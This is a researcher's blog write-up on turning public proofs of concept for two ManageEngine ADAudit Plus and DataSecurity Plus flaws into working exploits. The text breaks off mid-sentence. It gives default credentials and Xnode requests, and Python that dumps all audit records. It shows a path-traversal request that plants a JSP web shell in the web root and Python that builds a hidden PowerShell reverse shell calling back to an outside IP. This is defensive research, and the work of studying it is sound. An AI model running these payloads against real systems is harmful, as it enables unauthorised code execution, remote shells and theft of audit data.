Pwning ManageEngine — From PoC to Exploit

A deep dive into CVE-2020-11531 and CVE-2020-11532

Erik Wynter
Jun 28, 2022

Introduction

A little over two years ago, Sahil Dhar of xen1thLabs published two files on Packet Storm detailing two vulnerabilities affecting ManageEngine DataSecurity Plus and ManageEngine ADAudit Plus:

  • CVE-2020-11531 — A path traversal vulnerability that can lead to remote code execution (CVSSv3 base score: 8.8) — Packetstorm ID: 157604
  • CVE-2020-11532 — An authentication bypass vulnerability (CVSSv3 base score: 9.8) — Packetstorm ID: 157609

After coming across a vulnerable ManageEngine ADAudit Plus instance during a penetration test last year, I decided to look into these issues and try to turn the provided PoCs into fully functional exploits. This article details my research and shows how I eventually managed to achieve my goal.

First things first: what are ADAudit Plus and DataSecurity Plus?

ManageEngine ADAudit Plus is an IT auditing solution that allows users to monitor their Active Directory environment, file servers, Windows servers and Windows workstations in order to identify suspicious activity such as unusual logons, account lockouts, and changes to users, files, groups, security policies and more. DataSecurity Plus is designed for file server auditing with the aim of providing visibility while protecting sensitive data and preventing leaks.

1. CVE-2020-11532 — From default Xnode credentials to (limited) Active Directory enumeration

1.0 Authenticating to Xnode

The description of CVE-2020-11532 as an authentication bypass is rather misleading, because the actual issue here is simply the presence of default credentials. These do not affect the web UI, but the DataEngine Xnode server that is part of ADAudit Plus and DataSecurity Plus. The PoC on Packet Storm shows that you can use these credentials to authenticate to the Xnode server and subsequently execute commands. In order to do this, you need the following information:

The default credentials:

  • username: atom
  • password: chegan

The default Xnode ports:

  • ADAudit Plus: 29118/tcp
  • DataSecurity Plus: 29119/tcp

The Xnode server uses a simple TCP socket and communicates in JSON, so you can establish a connection to Xnode via netcat or a similar tool.

The PoC shows a successful authentication request, followed by an admin:/health status request. The server responses are printed right below the requests:

#~ nc 192.168.56.108 29119
{"username":"atom","password":"chegan","request_timeout":10,"action":"session:/authenticate"}
{"response":{"status":"authentication_success"},"request_id":-1}
{"action":"admin:/health","de_health":true, "request_id":1}
{"response":{"de_health":"GREEN"},"request_id":1}

1.1 Searching for available Xnode actions

There is little documentation available on the Xnode server and I was unable to find anything about the commands, or actions rather, that it supports. In order to find out more, I spun up a Windows Server 2019 VM and installed the latest version of ADAudit Plus on it, together with Wireshark. I then configured Wireshark to listen on the loopback interface with a display filter for the Xnode port, and began interacting with the ADAudit Plus web app. This way, I was able to intercept Xnode authentication and health status requests like the ones from the PoC, as well as a few additional actions such as the admin:/xnode_info action (details on this one are provided later on). However, none of these were particularly interesting, so I decided to switch strategies.
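For anyone recreating this setup, the display filter is simply the Xnode port, for example:

tcp.port == 29118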

1.2 Exploring the directory structure

I began inspecting the file structure of the ADAudit Plus installation directory, and soon found that anything Xnode related was stored at

<install_dir>\apps\dataengine-xnode

Information on the most relevant files is provided below. It should be noted that these results were virtually the same for DataSecurity Plus, since both apps seem to leverage the same Xnode codebase.

1.2.1 <install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf

This is the main Xnode configuration file, which includes settings for the Xnode port, username and password. On a vulnerable instance, it will look something like this:

xnode.connector.port = 29118
xnode.connector.username = atom
xnode.connector.password = chegan
xnode.connector.tcp.json_decode_size_mb = 20
xnode.db.store.dbname = store
xnode.db.store.dbadapter = hsqldb
xnode.db.store.username =
xnode.db.store.password =
xnode.dr.archive.zip_password =

1.2.2 <install_dir>\apps\dataengine-xnode\conf\datarepository\datarepositories.conf

Configuration for the enabled Xnode data repositories, which are basically database tables. Example:

[AdapFileAuditLog]
repository_name = AdapFileAuditLog
repository_state = ENABLED
repository_type = audit-log
description = File audit
container_name = audit-log
is_legacy = true
legacy_table_name = AUDFileAuditInfo
schema_name = AdapFileAuditLog_V1
store_raw_data = true
contains_duplicate = false
block_prefix = adapFileAuditLog
block_main_hot_count = 1
block_main_hot_refresh_interval = 1
block_main_hot_rotation_type = SIZE
block_main_hot_rotation_size = 3000000
block_main_hot_rotation_period =
block_main_retention_days = -1
block_frozen_retention_days = 1500
block_defrost_retention_days = 10
xnodes = localhost

1.2.3 <install_dir>\apps\dataengine-xnode\conf\datarepository\schema\

Directory containing JSON files that match the schema_name values for each data repository in datarepositories.conf, but with the .json file extension added to it. Each JSON file contains information on the fields, which are basically database columns, for the respective data repository. The below snippet shows the top of the AdapFileAuditLog_V1.json file, which corresponds to the AdapFileAuditLog datarepository.

{"mappings": {
"range_field": "TIME_GENERATED", "unique_fields": [ "TIME_GENERATED", "RECORD_NUMBER" ],
"default_analyzer": "KEYWORD_LOWERCASE",
"field_list": [
{"UNIQUE_ID": {
"docs_val": true,
"type": "long"
}},
{"MONITOR_ID": {
"docs_val": true,
"type": "long"
}},
{"EVENT_NUMBER": {
"docs_val": true,
"type": "integer"
}},
{"TIME_GENERATED": {
"docs_val": true,
"type": "long"
}},
[snipped]

1.2.4 <install_dir>\apps\dataengine-xnode\lib\

This directory contains a dozen or so jar files, at least three of which contain code relating to the Xnode server:

  • dataengine-commons.jar
  • dataengine-controller.jar
  • dataengine-xnode.jar

1.3 Searching inside JAR files with WinRAR

JAR stands for Java ARchive, and JAR files are indeed just archives. I’m not afraid to admit that I did not actually know this going in, since I had no real experience with Java, let alone Java code review. Another thing I learned, from one underappreciated answer to a question on StackOverflow, is that searching JAR files for strings can be very easily accomplished on Windows by using WinRAR (yes, really). So I downloaded WinRAR, took advantage of its world famous free trial, and began running search queries from

<install_dir>\apps\dataengine-xnode\lib\

My aim was to find the class defining the supported Xnode server actions, so my search terms contained the names of the Xnode actions I already knew to be supported.

Right away, I got some promising results. When investigating those, I soon found the hidden treasure in the dataengine-xnode.jar file at

com.manageengine.dataengine.xnode.connector.global.actionhandlers

There I found two classes that defined everything I wanted to know:

  • AdminRequestHandler.class
  • DataRepositoryRequestHandler.class

1.4 Digging into the JAR files

The next step was to open the JAR files in JD-GUI. I initially wasn’t familiar with this tool, but a quick search on the interwebs had told me that it is a great app for decompiling JAR files and the interwebs did not lie, because JD-GUI is fantastic.

1.4.1 AdminRequestHandler.class

This class lists the Xnode actions of the admin type. It contains a processRequest function, which checks for the actions in a bunch of if statements, each of which calls the function that will process the action and returns the result:

public TransportResponse processRequest(TransportRequest request) throws Exception {
  if (request.actionType().startsWith("admin:/health"))
    return processHealthRequest(request);
  if (request.actionType().startsWith("admin:/xnode_info"))
    return processXNodeInfoRequest(request);
  if (request.actionType().startsWith("admin:/update_security_settings"))
    return processUpdateSecuritySettingsRequest(request);
  if (request.actionType().startsWith("admin:/shutdown"))
    return processShutdownRequest(request);
  return TransportResponse.buildErrorResponse(request, 1, "Requested ADMIN operation not supported!");
}

By reading the source code of the defining functions I was able to build valid requests for these actions, which helped me figure out what each action does:

  • admin:/health — Xnode health status check:
{"action":"admin:/health","de_health":true, "request_id":1}
{"response":{"de_health":"GREEN"},"request_id":1}
  • admin:/xnode_info — Obtain the Xnode version and installation path:
{"action":"admin:/xnode_info","request_id":2}
{"response":{"xnode_installation_path":"C:\\Program Files (x86)\\ManageEngine\\ADAudit Plus\\apps\\dataengine-xnode","xnode_version":"XNODE_1_0_0"},"request_id":2}
  • admin:/shutdown — Shutdown the Xnode server (the server will not send a response). This could be used for DoS purposes:
{"action":"admin:/shutdown","request_id":2}
  • admin:/update_security_settings — Set the Xnode password for zip archives. The provided password will be stored in encrypted format in dataengine-xnode.conf as the value for the xnode.dr.archive.zip_password setting. Example:
{"action":"admin:/update_security_settings","archive_zip_pwd":"hunter2", "request_id":1}
{"response":{"error_code":0},"request_id":1}

After this, dataengine-xnode.conf will contain the encrypted password:

xnode.dr.archive.zip_password=0fb4820622fa139faba387f67b77a00d2af91b368cfdb267b29cb5c7b419aa44b0a0535a

I did not look into the type of encryption used here, since I had other plans.

1.5 DataRepositoryRequestHandler.class

This class also contains a processRequest function that reveals a whopping 18 additional actions in another hideous list of if statements:

public TransportResponse processRequest(TransportRequest request) throws Exception {
  if (request.actionType().startsWith("dr:/dr_data_add"))
    return processDataAddRequest(request);
  if (request.actionType().startsWith("dr:/dr_migration_data_add"))
    return processMigrationDataAddRequest(request);
  if (request.actionType().startsWith("dr:/dr_migration_data_validate"))
    return processMigrationDataValidateRequest(request);
  if (request.actionType().startsWith("dr:/dr_data_update"))
    return processDataUpdateRequest(request);
  if (request.actionType().startsWith("dr:/dr_data_delete"))
    return processDataDeleteRequest(request);
  if (request.actionType().startsWith("dr:/dr_search"))
    return processSearchRequest(request);
  if (request.actionType().startsWith("dr:/dr_sync"))
    return processDRSync(request);
  if (request.actionType().startsWith("dr:/dr_update"))
    return processDRUpdate(request);
  if (request.actionType().startsWith("dr:/dr_main_blocks_disk_size_fetch"))
    return processDRMainBlocksDiskSizeFetch(request);
  if (request.actionType().startsWith("dr:/dr_main_blocks_disk_size_older_than_fetch"))
    return processDRMainBlocksDiskSizeOlderThanFetch(request);
  if (request.actionType().startsWith("dr:/dr_schema_sync"))
    return processDRSchemaSync(request);
  if (request.actionType().startsWith("dr:/dr_blocks_meta_sync"))
    return processDRBlocksMetaSync(request);
  if (request.actionType().startsWith("dr:/dr_blocks_meta_fetch"))
    return processDRBlocksMetaFetch(request);
  if (request.actionType().startsWith("dr:/dr_blocks_count_fetch"))
    return processDRBlocksCountFetch(request);
  if (request.actionType().startsWith("dr:/dr_archive_old_blocks"))
    return processDRArchiveOldBlocks(request);
  if (request.actionType().startsWith("dr:/dr_archive_blocks_load"))
    return processArchiveBlocksLoad(request);
  if (request.actionType().startsWith("dr:/dr_archive_blocks_unload"))
    return processArchiveBlocksUnload(request);
  if (request.actionType().startsWith("dr:/dr_archive_locations_sync"))
    return processDRArchiveLocationsSync(request);
  return TransportResponse.buildErrorResponse(request, 1, "Requested DR Action not supported!");
}

Well, well, well, if it isn’t the freaking jackpot.

Based on the name alone, I figured that dr:/dr_search is where it’s at in terms of enumeration. However, several other actions are worth mentioning as well. They are discussed in the next section, categorized by their impact.

1.6 Xnode data repository actions and their impact

1.6 A) Manipulate data repository configuration and storage

1.6 A1) View and manipulate HSQLDB data blocks

I’m starting with this category because it provides a convenient point to discuss what Xnode data repositories actually are. Previously, I mentioned only that they resemble databases, and that data repository “fields” are like the columns making up a data repository. The true story is more complicated, and honestly still somewhat eludes me, but it should go something like this:

  • ADAudit Plus and DataSecurity Plus are each shipped with a PostgreSQL database that will be populated with the data the applications gather when monitoring file servers, Windows servers and Windows workstations.
  • Both projects also come with an HSQLDB (HyperSQL DataBase) for the Xnode server. This database stores “blocks” of data for each data repository.
  • The data repositories and their fields correspond with PostgreSQL database tables and their columns. I verified this by actually connecting to the PostgreSQL database for my ADAudit Plus instance.
  • Putting this together, I imagine that certain data in the PostgreSQL database, namely the audit data from the tables that correspond with data repositories, is periodically packed into blocks and copied over to the HSQLDB. Then whenever this data is requested by a user or an automated process, the Xnode server retrieves it from the HSQLDB.
  • Based on the source code, it seems that directly accessible datablocks are labeled “hot”, while archived ones are “frozen”. Archived blocks can be accessed after being “defrosted”.

The ADAudit Plus release notes for April 2019, when the DataEngine Xnode server was added, mention:

Faster search and retrieval of file audit data with ADAudit Plus’s all new DataEngine

So the reason behind this design seems to be that retrieving audit data from the HSQLDB via Xnode is faster than querying the PostgreSQL database for every search query or data retrieval request.

Again, this may not be a 100% correct description of how it works, but it should be close enough to make sense of the Xnode actions in this category:

  • dr:/dr_blocks_meta_fetch — Obtain the meta information of blocks for specific data repositories:
{"dr_name_list":["AdapFileAuditLog"], "action":"dr:/dr_blocks_meta_fetch","request_id":1}
{"response":{"dr_blocks_meta":[{"creation_time":1627865990666,"block_name":"adapFileAuditLog_1627865990666","doc_count":0,"size":0,"range_from":0,"datarepository_name":"AdapFileAuditLog","state":"HOT","raw_size":0,"is_merged":false,"version":10,"status":"-","range_to":0}]},"request_id":1}
  • dr:/dr_archive_old_blocks — Archive (“freeze”) blocks older than the maximum retention period specified for a specific data repository in datarepositories.conf
  • dr:/dr_archive_blocks_load — Defrost archived blocks
  • dr:/dr_archive_blocks_unload — Refreeze defrosted blocks

1.6 A2) Edit datarepositories.conf

  • dr:/dr_sync — Overwrite all data in datarepositories.conf
  • dr:/dr_update — Modify some or all of the data in datarepositories.conf

1.6 A3) Edit the datarepository schema files

  • dr:/dr_schema_sync — Write JSON files containing datarepository schema information to the <install_dir>\apps\dataengine-xnode\conf\datarepository\schema\ directory

1.6 B) Manipulate stored data

  • dr:/dr_data_add — Add data to the Xnode datarepositories
  • dr:/dr_data_update — Edit data in the Xnode datarepositories
  • dr:/dr_data_delete — Delete data from the Xnode datarepositories

1.6 C) Retrieve data from the datarepositories

  • dr:/dr_search — Retrieve data from the data repositories based on provided parameters

1.7 Looking into dr:/dr_search

As I previously hinted, the dr:/dr_search action was exactly what I needed to enumerate the data repositories. In this section I provide an overview of relevant classes and functions that process this action, and how I used this information to build a series of valid search queries to enumerate everything there was to enumerate.

1.7.1 processSearchRequest

As the below code snippet shows, the processSearchRequest function, which processes dr:/dr_search action requests, passes the received Xnode action request to the `build` function of a class called SearchRequest. The object it receives back is then passed to the executeSearch method of the SearchService class, whose result is returned to the calling function (processRequest).

private TransportResponse processSearchRequest(TransportRequest request) throws Exception {
LOGGER.info("SEARCH REQUEST received :: " + request.getRequest());
SearchRequest searchRequest = SearchRequest.build(request);
SearchService sService = new SearchService();
return sService.executeSearch(searchRequest);
}

1.7.2 SearchRequest.build

The qualified name of the SearchRequest class is

com.manageengine.adap.dataengine.xnode.datarepository.search.SearchRequest

The first few lines of its build function specify two mandatory parameters: query and dr_name_list:

public static SearchRequest build(TransportRequest request) throws Exception {
  SearchRequest searchRequest = new SearchRequest(request.requestId(), request.actionType());
  if (!request.has("query") ||
      !request.has("dr_name_list"))
    throw new Exception("Error while processing search-request, missing some mandatory request parameters(query|dr_name_list)");
  searchRequest.query(request.getString("query"));
  [snipped]
  • dr_name_list — This parameter should consist of a JSON array containing the name(s) of one or multiple data repositories as listed in datarepositories.conf.
  • query — This parameter should consist of a JSON string containing SQL-like statements where columns and values are separated by a colon. An example is shown below:
"query":"EVENT_TYPE:4 AND (EVENT_MACHINE_DOMAIN:ECORP OR EVENT_MACHINE_DOMAIN:ecorp.local)"

1.8 Blindly dumping data from the data repositories

In an attempt to retrieve all data from the existing data repositories, I first wrote a single query consisting of:

  • A specification of the dr_search action: "action":"dr:/dr_search"
  • The dr_name_list parameter mapped to an array of data repository names, eg:
"dr_name_list":["AdapFileAuditLog", "AdapPowershellAuditLog"]
  • The query parameter mapped to a string containing the TIME_GENERATED column, with its value set to a range between two Unix Epoch timestamps, eg:
"query":"TIME_GENERATED:[1595851364 TO 2627369199]"

It should be noted that no sanity check is performed on the lower and upper timestamp values, so to ensure that all data will be returned, you can set the lower timestamp all the way back to 1970 and the upper one to a date in the future.

  • (Automated Xnode server requests always include the request_id parameter, which is mapped to an integer value, eg: "request_id":1. However, this parameter is not required.)

Throwing this all together, my very basic search request to dump all data looked something like this:

{"dr_name_list":["AdapFileAuditLog","AdapPowershellAuditLog"],"query":" TIME_GENERATED:[1595851364 TO 2627369199]","action":"dr:/dr_search","request_id":1}

However, I discovered that this request has at least four major shortcomings:

  1. If one of the data repositories in `dr_name_list` doesn't actually exist on the target, Xnode will throw an error.
  2. Xnode will return each database record (i.e. row) as a JSON array containing only the values for that record, without the field (column) names. This means that you can never be fully sure which field a specific value belongs to.
  3. Xnode will remove trailing values from the response if they are null. This is annoying if you are trying to parse the response and expect the number of values returned for a record to match the number of fields for that data repository.
  4. The default maximum number of records (i.e. database rows) that Xnode will return is 10.

1.9 Precision dumping

1.9.1 Overcoming problem 1: one at a time, please

The first issue is very easily overcome by querying all data repositories that may exist on the target one by one. For ADAudit Plus, there are only two data repositories that may exist on a vulnerable host:

  • AdapFileAuditLog — Present in all vulnerable versions (builds 6000–6032). This is the only data repository that corresponds with a differently named table in the PostgreSQL database (AUDFileAuditInfo instead of AdapFileAuditLog)
  • AdapPowershellAuditLog — Present in some vulnerable versions (builds 6030–6032).

For DataSecurity Plus, there are too many possible data repositories to list here.

An example search query for a single data repository is shown below, together with the partial server response:

{"dr_name_list":["AdapPowershellAuditLog"],"query":" TIME_GENERATED:[1595851364 TO 2627369199]","action":"dr:/dr_search","request_id":1}
{"response":{"search_after":"doc=9 score=1.0 shardIndex=0","total_hits":87,"search_result":[["601",null,null,null,null,"ECORP-DC.ecorp.local","ecorp.local",null,"4104","16",null,null,"6408ff47-e568-447e-9c4a-0ba2688e1ab5","554",null,"& C:\\Windows\\TEMP\\SDIAG_e90ece72-963b-44ea-ac0d-3b75d418b6d1\\TS_WERQueue.ps1<br>","1",null,"1638969202","Administrator","S-1-5-21-865699249-1322998900-1895168254-500","1","129",null,null,null],[snipped]

1.9.2 Overcoming problem 2 and 3: specifying fields

In order to know for sure what column a specific value in the Xnode response belongs to, you can specify fields to query via the select_fields parameter. The value for this should be a JSON array containing field names. If you do this, Xnode will always return the value for that field, so trailing null values will no longer be dropped from the response. Moreover, if a specified field doesn’t actually exist, Xnode will simply return a null value for the non-existent field. A full query would then look something like this:

{"dr_name_list":["AdapFileAuditLog"],"query":" TIME_GENERATED:[1595851364 TO 2627369199]","select_fields":["CALLER_USER_DOMAIN","CALLER_USER_NAME"],"action":"dr:/dr_search","request_id":1}

1.9.3 Overcoming problem 4: unique_id, min, max and total_hits

In order to find a solution for the problem of Xnode returning only up to 10 records per query, I wasted quite some time on a fruitless search through the source code for the function defining this behavior, or a parameter allowing me to increase the number of returned records per query. Eventually I chose to pursue a different approach instead, namely that of enumerating through all available records in batches of 10. Fortunately, the way to achieve this wasn’t too hard to figure out.

While inspecting various data repositories on ADAudit Plus and DataSecurity Plus, I noticed that all the interesting ones contained a UNIQUE_ID field, which I hoped would allow me to prevent requesting the same record multiple times when enumerating Xnode. After some trial and error, I confirmed that this was possible, namely by specifying the range of UNIQUE_ID values to request using the query param like this:

"query":"UNIQUE_ID:[1 TO 10]"

By simply increasing the min and max value of UNIQUE_ID, enumeration is possible, as the two example queries below show:

{"dr_name_list":["AdapPowershellAuditLog"],"query":"UNIQUE_ID:[1 TO 10]","select_fields":["UNIQUE_ID"],"action":"dr:/dr_search","request_id":1}
{"response":{"search_after":"doc=9 score=1.0 shardIndex=0","total_hits":10,"search_result":[["1"],["2"],["3"],["4"],["5"],["6"],["7"],["8"],["9"],["10"]],"index_count":1},"request_id":1}
{"dr_name_list":["AdapPowershellAuditLog"],"query":"UNIQUE_ID:[11 TO 20]","select_fields":["UNIQUE_ID"],"action":"dr:/dr_search","request_id":1}
{"response":{"search_after":"doc=19 score=1.0 shardIndex=0","total_hits":10,"search_result":[["11"],["12"],["13"],["14"],["15"],["16"],["17"],["18"],["19"],["20"]],"index_count":1},"request_id":1}

The first query requests the UNIQUE_ID values for all records with UNIQUE_ID values between 1 and 10, while the second requests the same but for records with UNIQUE_ID values between 11 and 20. In both cases, the Xnode response contains the expected UNIQUE_ID values.

Of course, if I was going to enumerate over a potentially massive number of records in batches of 10, I figured it would be nice to have a way to narrow down the range of possible values for UNIQUE_ID. I found the answer to this in the following code snippet from the SearchRequest.build function, which reveals a parameter called aggr that supports several sub-parameters, including min and max.

if (request.has("aggr")) {
  JSONObject jAggr = request.getJSONObject("aggr");
  if (jAggr.length() > 0) {
    String aggrKey = jAggr.keys().next();
    if (aggrKey.equals("min")) {
      buildMinAggregation(searchRequest, jAggr);
    } else if (aggrKey.equals("max")) {
      buildMaxAggregation(searchRequest, jAggr);
    } else if (aggrKey.equals("sum")) {
      buildSumAggregation(searchRequest, jAggr);
[snipped]

As the names imply, min and max can be used to request the record(s) with the lowest or the highest value for a certain field, respectively. If that field is specified as UNIQUE_ID, it is possible to obtain the full range of UNIQUE_ID values for all existing records, so you know from what UNIQUE_ID value to start enumerating and also when you’ve reached the last record.

Example of an aggr min request:

{"dr_name_list":["AdapPowershellAuditLog"],"query":" TIME_GENERATED:[1000000000 TO 2627369199]","aggr":{"min":{"field":"UNIQUE_ID"}},"action":"dr:/dr_search","request_id":1}
{"response":{"total_hits":0,"search_result":[],"aggr_result":{"min":"1.0"},"index_count":0},"request_id":1}

Example of an aggr max request:

{"dr_name_list":["AdapPowershellAuditLog"],"query":" TIME_GENERATED:[1000000000 TO 2627369199]","aggr":{"max":{"field":"UNIQUE_ID"}},"action":"dr:/dr_search","request_id":1}
{"response":{"total_hits":0,"search_result":[],"aggr_result":{"max":"1232.0"},"index_count":0},"request_id":1}

So in this example, the existing UNIQUE_ID values range from 1 to 1,232.

Finally, every Xnode response to a search query includes a total_hits parameter. If a request for all possible records is sent, total_hits will reveal the total number of records in the database (even though it will return only up to 10 records).
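Putting all of this together, dumping a data repository can be scripted in batches of 10. The Python sketch below reuses the hypothetical xnode_request helper from the authentication example earlier; the repository and field names are merely illustrative:

def get_unique_id_bound(sock, dr_name, kind):
    # kind is "min" or "max"; returns the lowest/highest UNIQUE_ID as an int
    resp = xnode_request(sock, {
        "dr_name_list": [dr_name],
        "query": "TIME_GENERATED:[0 TO 2627369199]",
        "aggr": {kind: {"field": "UNIQUE_ID"}},
        "action": "dr:/dr_search",
        "request_id": 1,
    })
    return int(float(resp["response"]["aggr_result"][kind]))  # e.g. "1232.0" -> 1232

def dump_repository(sock, dr_name, fields):
    lo = get_unique_id_bound(sock, dr_name, "min")
    hi = get_unique_id_bound(sock, dr_name, "max")
    records = []
    for start in range(lo, hi + 1, 10):  # Xnode returns at most 10 records per query
        resp = xnode_request(sock, {
            "dr_name_list": [dr_name],
            "query": "UNIQUE_ID:[%d TO %d]" % (start, start + 9),
            "select_fields": fields,
            "action": "dr:/dr_search",
            "request_id": 1,
        })
        for row in resp["response"]["search_result"]:
            records.append(dict(zip(fields, row)))  # map values back to their field names
    return records

records = dump_repository(s, "AdapPowershellAuditLog", ["UNIQUE_ID", "CALLER_USER_NAME"])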

1.9.4 From PoC to MSF module

Now that I knew how to use Xnode to enumerate over all possible data repositories and all records in those data repositories, I decided to automate the process by writing two auxiliary modules for the Metasploit framework, one for ADAudit Plus, and one for DataSecurity Plus. Because both modules required a lot of the same code for interacting with the Xnode server, I decided to add an Xnode mixin as part of this effort that could be leveraged by both modules. The PR is available HERE.

The below video shows a successful run of the ADAudit Plus module against my test system. The module follows these steps:

  • Attempt to authenticate to Xnode using default (or user-specified) credentials. (In the demo video I specify the password because the target app is not actually vulnerable to CVE-2020-11532. If the app you are targeting is vulnerable, the attack will work the same way, except that you won't have to set the password.)
  • Send an admin:/health status request
  • Send an admin:/xnode_info request to obtain the Xnode version and installation path
  • Send a single dr:/dr_search request for each possible data repository to verify if it exists on the target and, if so, obtain the total number of records
  • If a data repository exists, two additional dr:/dr_search requests are sent. The first uses aggr min to obtain the lowest UNIQUE_ID value for the data repository. Predictably, the second request uses aggr max to obtain the highest UNIQUE_ID value.
  • For each existing, non-empty data repository, the module uses the obtained lowest and highest UNIQUE_ID values to request all existing records in a series of dr:/dr_search requests. These requests include specific field names so that the values returned by Xnode for each record can be mapped to their corresponding field (column) name. The field names to specify are obtained from a configuration file for each module, which can be edited by users to their needs.
  • Finally, the parsed results for the data repositories are saved to JSON files in
~/.msf4/loot/

1.10 Video || GTFO

1.11 Obtaining archived data (untested)

I am not fully sure whether or not the dr:/dr_search command will also retrieve archived data, i.e. data from “frozen” data blocks in the HSQLDB, but it would make sense if it doesn't. In that case, it might be possible to obtain archived data like this:

  • Use dr:/dr_blocks_meta_fetch to first get the names of all existing blocks, including “frozen” ones
  • Pass the names of the frozen blocks in a query to dr:/dr_archive_blocks_load in order to unfreeze them
  • Run my module to enumerate all records via dr:/dr_search

2. CVE-2020-11531 — From PoC to Meterpreter

2.1 The dangerous action: dr:/dr_schema_sync

As Sahil’s PoC outlines, this vulnerability is a directory traversal issue originating in the function that handles the dr:/dr_schema_sync action. As discussed previously, the dr:/dr_schema_sync action can be used to update the data repository (database) schema information that is stored in several JSON files in

<install_dir>\apps\dataengine-xnode\conf\datarepository\schema\

A valid dr:/dr_schema_sync request should contain the dr_schema_list parameter. The value for this parameter is a hash, which has as its keys the names of the data repository schema files, and as its values the contents of those JSON files. For each schema filename, Xnode will create a file with the specified contents. Any files that are already present in the schema directory, regardless of their name, will be wiped in the process.

A legitimate dr:/dr_schema_sync request will be super long, so the below example is heavily snipped:

{"dr_schema_list":{"AdapPowershellAuditLog_V1.json":{"mappings":{"range_field":"TIME_GENERATED","unique_fields":["TIME_GENERATED","RECORD_NUMBER"],"default_analyzer":"KEYWORD_LOWERCASE","field_list":[{"UNIQUE_ID":{"docs_val":true,"type":"long"}},{"COMMAND_NAME":{"docs_val":true,"type":"text"}},{"COMMAND_PATH":{"docs_val":true,"type":"text"}},{"COMMAND_TYPE":{"docs_val":true,"type":"text"}},{"COMMAND_INVOCATION":{"docs_val":true,"type":"text"}},{"EVENT_MACHINE_NAME":{"docs_val":true,"type":"text"}},{"EVENT_MACHINE_DOMAIN":{"docs_val":true,"alias_name":"DOMAIN","type":"text"}},

{more stuff},
{a lot more stuff},
{like really a lot more stuff},

"action":"dr:/dr_schema_sync","request_id":2}

2.2 The vulnerable function: syncDRSchemas

The dr:/dr_schema_sync action is processed by the processDRSchemaSync function, which then calls syncDRSchemas in DataRepositoryManager.class to actually delete the existing files in the schema directory, and create new file(s). This class can be found in dataengine-xnode.jar at

com.manageengine.dataengine.xnode.datarepository.DataRepositoryManager

The full function is shown below:

public static JSONObject syncDRSchemas(DataRepositoryActionRequest request) throws Exception {
  JSONObject jResponse = new JSONObject();
  JSONObject jSchemas = request.drSchemaListObj();
  File schemasFolder = ((Path)Environment.XNODE_DR_SCHEMA_DIR.value()).toFile();
  schemaMap = new ConcurrentHashMap<>();
  if (!schemasFolder.exists())
    schemasFolder.mkdirs();
  if (schemasFolder.isDirectory()) {
    File[] schemaFileList = schemasFolder.listFiles();
    for (File schemaFile : schemaFileList)
      schemaFile.delete();
  }
  Iterator<String> iterator = jSchemas.keys();
  while (iterator.hasNext()) {
    String key = iterator.next();
    BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(Environment.XNODE_DR_SCHEMA_DIR.value() + File.separator + key)));
    bw.write(jSchemas.getJSONObject(key).toString(2));
    bw.close();
    XNodeDRSchema xNodeDRSchema = new XNodeDRSchema(key.replace(".json", ""), jSchemas.getJSONObject(key));
    schemaMap.put(xNodeDRSchema.getSchemaName(), xNodeDRSchema);
    LOGGER.info("SYNCHED : DataRepository Schema '" + key + "'");
  }
  checkFieldWithMultipleDataTypes();
  jResponse.put("error_code", 0);
  return jResponse;
}

In the top half of the function (roughly), syncDRSchemas checks if the schema folder exists and if it is actually a directory. If so, it will check which files are present in that directory (if any), and delete them one by one.

In the bottom half, syncDRSchemas iterates over the provided filenames. For each name, it will create a file with that name and write the provided contents to it.

As the PoC points out, the problem is that this function does not validate the provided filenames. As a result, filenames can include directory traversal sequences like ..\, making it possible to write a file to directories other than schema, such as the DataSecurity Plus web root at

<install_dir>\webapps\fap\

In addition, any file extension is allowed, including JSP.

In order to write a file named poc.jsp to the web root, the dr:/dr_schema_sync request should match the following format:

{"action":"dr:/dr_schema_sync","request_id":1,"dr_schema_list":{"../../../../../webapps/fap/poc.jsp":{"randomkeyname":"myevilpayload"}}}

The Xnode server will respond with the following error:

{"response":{"error_msg":"org.json.JSONException: mappings key not found in ../../../../../webapps/fap/poc.jsp template!","error_code":1},"request_id":1}

But you can ignore this because by now,

<install_dir>\webapps\fap\poc.jsp 

should exist with the following contents:

{"randomkeyname": "myevilpayload"}

2.3 Payload limitations

In order to weaponize this, myevilpayload should be replaced with valid Java code wrapped in JSP scriptlet tags like this:

"<% System.out.println(1337); %>"

The full request then looks like this:

{"action":"dr:/dr_schema_sync","request_id":1,"dr_schema_list":{"../../../../../webapps/fap/poc.jsp":{"wynter":"<% System.out.println(1337); %>"}}}

The contents of poc.jsp will be:

{"wynter":"<% System.out.println(1337); %>"}

If you load this page in your browser by navigating to

http://<ip of datasecurity plus>:8800/poc.jsp

the page will show only the following:

{"wynter":""}

This is because the Java print statement is executed server-side, so its output goes to the server console rather than the rendered page.
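By contrast, a quote-free JSP expression should render its result in the page. For example (hypothetical, but it follows from how JSP expressions work), a file containing

{"wynter":"<%= 1337 %>"}

should be served as {"wynter":"1337"}.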

Unfortunately, a simple exploit leveraging Runtime.getRuntime().exec(payload) will not work with standard payloads. This is because the files created in response to a dr:/dr_schema_sync request can only contain valid JSON, and if the provided file contents aren't in this format, they will be converted to it. This means that special characters such as quotes will be automatically escaped, rendering typical payloads unusable.

2.4 Bytes bytes baby

The PoC contains a very neat trick to overcome this issue. In order to avoid having to deal with special characters at all, the exec call wraps the payload in new String(new byte[]{...}), so that the payload can be delivered as a byte array that is converted back to a string before being passed to the exec call.
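Reconstructed from the PoC's description, building such a payload might look something like this in Python (the PowerShell command is abbreviated and the variable names are my own):

from base64 import b64encode

# Reverse shell one-liner as in the PoC (abbreviated here);
# PowerShell's -Enc flag expects base64 of a UTF-16LE encoded string
ps_cmd = "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.128',443); ..."
cmd = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc "%s"' % b64encode(ps_cmd.encode("utf-16-le")).decode()

# Encode the whole command as a Java byte-array literal, so the JSP scriptlet
# contains no quotes or backslashes for the JSON encoder to escape
byte_list = ",".join(str(b) for b in cmd.encode())
scriptlet = "<% Runtime.getRuntime().exec(new String(new byte[]{" + byte_list + "})); %>"

# This request can then be sent to Xnode after authenticating
request = {
    "action": "dr:/dr_schema_sync",
    "request_id": 1,
    "dr_schema_list": {"../../../../../webapps/fap/poc.jsp": {"wynter": scriptlet}},
}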

2.5 More payload limitations

However, the story doesn’t end here, for I found that this approach doesn’t seem to like complex (and therefore larger) payloads, like those produced by msfvenom.

The payload used in the PoC consists of a simple PowerShell call that takes a base64 encoded command:

